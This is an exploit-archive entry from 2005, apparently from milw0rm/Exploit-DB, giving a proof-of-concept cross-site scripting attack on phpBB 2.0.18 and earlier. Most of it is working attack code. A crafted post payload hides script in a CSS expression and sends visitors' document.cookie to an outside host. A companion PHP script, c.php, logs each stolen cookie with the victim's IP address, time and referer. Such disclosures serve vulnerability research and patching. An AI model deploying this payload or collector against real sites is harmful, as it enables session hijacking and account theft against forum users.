phpBB 2.0.18 - Cross-Site Scripting / Cookie Disclosure

EDB-ID:

1383

CVE:

N/A


Author:

jet

Type:

webapps


Platform:

PHP

Date:

2005-12-21


/******************************************************************

phpBB <= 2.0.18 XSS Cookie Disclosure Proof of Concept
	-- 'the html is on exploit'

original exploit by:  (cXIb8O3) - 12/16/2005
proof of concept by: jet
	-- http://jet.carbon-4.net/
	
		develop a pure, lucid mind, not 
		depending upon sound, flavor,
		touch, odor, or any quality.
				- the diamond sutra

******************************************************************/

phpbb code:

<B C=">" ''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://www.url.com/cookie/c.php?c='+document.cookie;this.sss=null`style='font-size:0; X="<B ">'</B>

c.php:

<?php
 $cookie = $_GET['c'];
 $ip = getenv ('REMOTE_ADDR');
 $date=date("m/d/Y g:i:s a");
 $referer=getenv ('HTTP_REFERER');
 $fl = fopen('log.txt', 'a');
 fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer." :: ".$cookie."\n");
 fclose($fl);
?>

# milw0rm.com [2005-12-21]